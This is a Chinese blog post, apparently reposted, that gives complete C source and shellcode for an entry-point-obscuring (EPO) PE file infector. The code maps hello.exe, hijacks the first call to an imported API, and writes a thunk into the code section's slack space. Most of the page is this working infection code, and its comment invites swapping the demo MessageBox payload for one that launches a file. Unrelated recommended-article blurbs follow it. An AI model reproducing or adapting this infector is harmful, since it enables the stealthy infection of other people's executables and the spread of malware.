用C实现简单的EPO

最新推荐文章于 2024-04-01 19:43:29 发布
最新推荐文章于 2024-04-01 19:43:29 发布
阅读量557 收藏
点赞数
分类专栏: 病毒汇编和调试逆向技术加脱壳 文章标签: c header file image dos null
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iiprogram/article/details/2448665
版权

//:::从代码节开始搜索,替换第一个发现的call api的指令
//:::把目标代码插入代码节的尾部
//:::代码仅供演示之用,没有做过多的错误处理
//:::感染当前hello.exe,插入一段弹出对话框代码(当然你可以修改成启动文件的代码,嘿嘿)
//:::coded by robinh00d
//:::robinh00d_at_163.com
//:::编译:cl epo.c
/*
要插入的反汇编代码thunk code:
00401006    .   60                   PUSHAD
00401007    .   9C                   PUSHFD
00401008    .   E8 00000000          CALL msg.0040100D
0040100D    $   5B                   POP EBX
0040100E    .   81EB 0D104000        SUB EBX,msg.0040100D
00401014    .   6A 00                PUSH 0
00401016    .   8D83 30104000        LEA EAX,DWORD PTR DS:[EBX+401030]
0040101C    .   50                   PUSH EAX
0040101D    .   50                   PUSH EAX
0040101E    .   6A 00                PUSH 0
00401020    .   B8 78563412          MOV EAX,12345678             ;这里感染前会被替换成正确的MessageBoxA的地址
00401025    .   FFD0                 CALL EAX
00401027    .   9D                   POPFD
00401028    .   61                   POPAD
00401029    .   FF25 3A104000        JMP DWORD PTR DS:[40103A]    ;跳到API
0040102F       90                   NOP
00401030    .   72 6F 62 69 6E 68 3>ASCII "robinh00d",0
*/
#include <windows.h>

#pragma comment(lib,"kernel32.lib")
#pragma comment(lib,"user32.lib")

char szHostFile[] = ".//hello.exe" ;
PIMAGE_DOS_HEADER pImageDosHeader ;
PIMAGE_NT_HEADERS pImageNtHeaders ;
PIMAGE_SECTION_HEADER pImageSectionHeader ;

unsigned char thunkcode[] = "/x60/x9c/xe8/x00/x00/x00/x00/x5b"
                             "/x81/xeb/x0d/x10/x40/x00/x6a/x00"
                             "/x8d/x83/x30/x10/x40/x00/x50/x50"
                             "/x6a/x00/xb8/x78/x56/x34/x12/xff"
                             "/xd0/x9d/x61/xff/x25/x3a/x10/x40"
                             "/x00/x90/x72/x6f/x62/x69/x6e/x68"
                             "/x30/x30/x64/x00" ;

int main()
{
     HANDLE hFile ;
     HANDLE hMap ;
     LPVOID pMapping ;
     DWORD dwGapSize ;
     unsigned char *pGapEntry ;
     int i ;
     PROC MsgBox ;
     DWORD OldEntry ;
     int x = 0x18 ;
     int vir_len ;
     unsigned char *pSearch ;
     DWORD *dwCallNextAddr ;
     DWORD *dwCallDataOffset ;
     DWORD *dwCallDataAddr ;
     DWORD dwCallData ;
     DWORD dwCodeDistance ;
     DWORD *dwJmpAddr ;
     DWORD dwJmpData ;
     DWORD dwJmpVA ;

     //:::
     hFile = CreateFile(szHostFile,
                         FILE_ALL_ACCESS,
                         FILE_SHARE_READ,
                         NULL,
                         OPEN_EXISTING,
                         FILE_ATTRIBUTE_NORMAL,
                         NULL) ;
                        
     if (hFile==-1)
     {
         printf("Open host file failed!/n") ;
         return -1 ;
     }
    
     hMap = CreateFileMapping(hFile,
                             NULL,
                             PAGE_READWRITE,
                             0,
                             0,
                             NULL) ;
     if (!hMap)
     {
         printf("Create file mapping falied!/n") ;
         return -1 ;
     }
    
     pMapping = MapViewOfFile(hMap,
                         FILE_MAP_ALL_ACCESS,
                         0,
                         0,
                         0) ;
     if (!pMapping)
     {
         printf("Map view of file failed!/n") ;
         return -1 ;
     }
    
     //::::::打开目标宿主文件,先检测文件是否PE格式,定位到代码的末尾
     pImageDosHeader = (PIMAGE_DOS_HEADER)pMapping ;
     if (pImageDosHeader->e_magic==IMAGE_DOS_SIGNATURE)
     {
         pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)pMapping+pImageDosHeader->e_lfanew) ;
         if (pImageNtHeaders->Signature==IMAGE_NT_SIGNATURE)
         {
             //:::是合法的PE文件
             //:::定位到节表头
             pImageSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pMapping+
                                                             pImageDosHeader->e_lfanew+
                                                             sizeof(IMAGE_NT_HEADERS)) ;
             //:::计算第一个节的空隙大小
             dwGapSize = pImageSectionHeader->SizeOfRawData - pImageSectionHeader->Misc.VirtualSize ;
            
             //:::如果代码缝隙小于thunk code的大小则感染失败
             if (sizeof(thunkcode)>dwGapSize)
             {
                 printf("no more space to fill!/n") ;
                 goto Close ;
                
             }
             //:::定位到代码末尾
             pGapEntry = (unsigned char *)(pImageSectionHeader->PointerToRawData+
                                             (DWORD)pMapping+
                                             pImageSectionHeader->Misc.VirtualSize) ;
            
             OldEntry = pImageNtHeaders->OptionalHeader.ImageBase+
                         pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;

             MsgBox = (PROC)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA") ;

             //修改为当前系统的MessageBoxA地址
             for (i=3;i>=0;i--)
             {
                 thunkcode[i+27] = ((unsigned int)MsgBox>>x)&0xff ;
                 x -= 8 ;
             }
             x = 24 ;
            
             vir_len = (int)pImageSectionHeader->Misc.VirtualSize ;
            
             pSearch = (unsigned char *)(pImageSectionHeader->PointerToRawData+
                         (DWORD)pMapping) ;
                        
             //:::搜索call指令(0xe8)
             for (i=0;i<vir_len;i++)
             {
                 if (pSearch[i]==0xe8)
                 {
                     //:::call指令操作数地址
                     dwCallDataAddr = (DWORD *)(&pSearch[i]+1) ;
                     //:::call下条指令地址
                     dwCallNextAddr=(DWORD *)(&pSearch[i]+5) ;
                     //:::jmp指令地址
                     dwJmpAddr = (DWORD *)(*dwCallDataAddr+ (DWORD)dwCallNextAddr) ;
                     //:::Jmp指令在内存的虚拟地址VA
                     dwJmpVA = (DWORD)dwJmpAddr-
                                 ((DWORD)pMapping+pImageSectionHeader->PointerToRawData)+
                                 pImageNtHeaders->OptionalHeader.ImageBase+
                                 pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;
                     //:::取jmp操作数,返回的时候使用
                     dwJmpData = *((DWORD *)((unsigned char *)dwJmpAddr+2)) ;

                     if ((*dwJmpAddr&0xffff)==0x25ff)
                     {
                         //:::修改call操作数
                         dwCodeDistance = (DWORD)pGapEntry - (DWORD)dwCallNextAddr ;
                         *dwCallDataAddr = dwCodeDistance ;
                         //:::原jmp里的操作数,替换到thunk code的末尾
                         for (i=3;i>=0;i--)
                         {
                             thunkcode[i+37] = ((unsigned int)dwJmpData>>x)&0xff ;
                             x -= 8 ;
                         }
                         //把thunk code写入目标宿主程序
                         for (i=0;i<sizeof(thunkcode);i++)
                         {
                             pGapEntry[i] = thunkcode[i] ;
                         }
                         break ;
                     }
                 }
                
             }
            
         }
     }
     else
     {
         printf("Invalid file format!/n") ;
     }
     Close:
     UnmapViewOfFile(pMapping) ;
     CloseHandle(hMap) ;
     CloseHandle(hFile) ;
    
     return 0 ;
}

Python 实现策略梯度算法来优化股票交易策略
AI天才研究院
08-20 1034
股票市场是投资者最主要的收益来源之一。近几年,股票市场在全球范围内发展迅猛。随着互联网经济的发展,越来越多的人开始通过网络进行股票交易。这些网络平台对股票市场的影响也越来越大,并产生了各种各样的股票交易策略。其中一种比较有效率的策略就是策略梯度算法(Gradient-Based Strategy)。策略梯度算法是一种基于强化学习领域中强化学习中的概念,其原理类似于自然界生物进化中的繁殖算法。该算法利用历史数据对当前状态的估计,并根据预测结果调整其动作,使得未来收益最大化。
linux下Epoll实现简单的C/S通信
JoeBlackZQQ的专栏
02-12 937
From: http://blog.youkuaiyun.com/piaojun_pj/article/details/6103709   epoll的优点: 1.支持一个进程打开大数目的socket描述符(FD)     select 最不能忍受的是一个进程所打开的FD是有一定限制的,由FD_SETSIZE设置,默认值是2048。对于那些需要支持的上万连接数目的IM服务器来说显然太少了。这时候你
Vue3 -- 基于Websocket实现简易聊天室
热门推荐
zhangdm的博客
06-10 4万+
聊天室
McAfee EPO4.6的迁移和升级
weixin_34378045的博客
11-12 866
  由于公司EPO服务器使用的是2003系统,太过老旧且EPO5.0开始不再支持2003的系统。于是考虑把EPO迁移和升级,本想一步到位直接使用2012系统,因其他应用的限制放弃,不过2008R2以后也可以直接升到2012。   迁移步骤: 一、备份   1、备份文件    C:\Program Files\McAfee\ePolicy Orchestr...
【智能算法】帝企鹅优化算法(EPO)原理及实现
最新发布
Logic_9527的博客
04-01 1598
EPO模拟了帝企鹅在寒冷冬季的聚集行为,群体通过产生热量来维持温暖。每个帝企鹅个体都会朝着群体中温度较高的方向移动,并寻找到达温度最高处的最优位置。在移动过程中,每个帝企鹅个体会根据自身与最优位置的距离进行调整,并不断更新最优位置,以此实现群体内个体的优化移动和位置更新。其中,P,Pep分别表述最优个体位置和个体当前位置。A,C是避免相邻个体间碰撞的向量参数,S表示帝企鹅群体最优个体方向移动趋势。其中,k为当前迭代次数,R表述个体距离拥挤群体中心的半径。
OC 实现扫雷达扫描动画
carbonzhao的专栏
04-19 1308
先上效果,如下:忽略优快云这个动画展示效果,掉帧严重,导致下面的动画不流畅。 上代码: typedef NS_ENUM(NSInteger,UISpinnerAnimationViewAnimation) { UISpinnerAnimationViewAnimationSpinner,//拖尾绕圈 UISpinnerAnimationViewAnimationRador, //雷达 }; @interface UISpinnerAnimationView : UIVie..
用 Keras 在 MNIST 上实现卷积神经网络
Klay Ye
04-02 975
官方教程:keras/examples/mnist_cnn.py '''Trains a simple convnet on the MNIST dataset. Gets to 99.25% test accuracy after 12 epochs (there is still a lot of margin for parameter tuning). 16 seconds per epo...
FCN详解与pytorch简单实现(附详细代码解读)
weixin_43143670的博客
03-14 3万+
第一部分:算法理解 理解FCN需要有CNN基础 0.基于CNN的分割方法与FCN的比较 传统的基于CNN的分割方法:为了对一个像素分类,使用该像素周围的一个图像块作为CNN的输入用于训练和预测。这种方法有几个缺点: 一是存储开销很大。例如对每个像素使用的图像块的大小为15x15,然后不断滑动窗口,每次滑动的窗口给CNN进行判别分类,因此则所需的存储空间根据滑动窗口的次数和大小急剧上升。 二是计算效...
病毒分析,病毒原理,ASLR,DEP,EPO
zhuhuibeishadiao
05-29 2016
1.病毒分析的基本工具方法 整体的思维:利用一些工具来监控程序调用了哪些API或行为 ~1.对于监控API ~~1.apilog18pub http://www.softpedia.com/get/Programming/Other-Programming-Files/API-Logger.shtml ~~2.Api Monitor x86 x64都有 (强力推荐!!!) ~2.使用行为
Python库 | jenkins-epo-1.125.tar.gz
03-06
Python作为一门强大的开发语言,拥有丰富的库支持各种任务,其中Jenkins-EPO是针对Jenkins进行扩展的一个Python库,其版本1.125为开发者提供了更多便利。本文将深入探讨这个库的功能、用法以及它在Python环境中的...
McAfee ePO product guide
03-11
- **版权信息**:McAfee ePolicy Orchestrator (ePO) 5.1.0 的文档版权属于 McAfee, Inc. 并在 2014 年注册,明确禁止未经授权复制。 - **商标归属**:文档列举了一系列 McAfee 的商标和注册商标,包括但不限于 ...
Python库 | jenkins_epo-1.138-py3-none-any.whl
02-16
使用此库,开发者可以编写脚本实现CI/CD流程的自动化,如构建、测试、部署等,进一步提高软件开发的敏捷性和可靠性。 在Python项目中,通常会结合其他工具和库,如Git进行版本控制,Docker进行容器化,以及Ansible...
McAfee_EPO_4.5的备份和还原
11-04
### McAfee_EPO_4.5的备份和还原 #### 一、McAfee EPO的备份 **1.1 服务器相关信息备份** 在进行McAfee EPO系统的备份前,首要步骤是备份服务器的基本信息,包括但不限于计算机名、IP地址、DNS设置等。这些信息...
EPO 460 product guide
08-29
### McAfee ePolicy Orchestrator (EPO) 4.6.0 相关知识点 #### 一、产品概述 **McAfee ePolicy Orchestrator (EPO)** 是一款功能强大的安全事件管理平台,旨在帮助企业集中管理和控制其网络安全基础设施。最新...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9440
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3977
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 7350
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1928
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
Python库 jenkins_epo-1.66 安装与使用教程
Python作为一种流行的编程语言,其在Jenkins中的应用主要通过执行Python脚本,或者作为Jenkins流水线(Pipeline)的一部分来实现。这涉及到使用jenkins_epo-1.66-py2-none-any.whl这样的Python库,来与Jenkins API...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值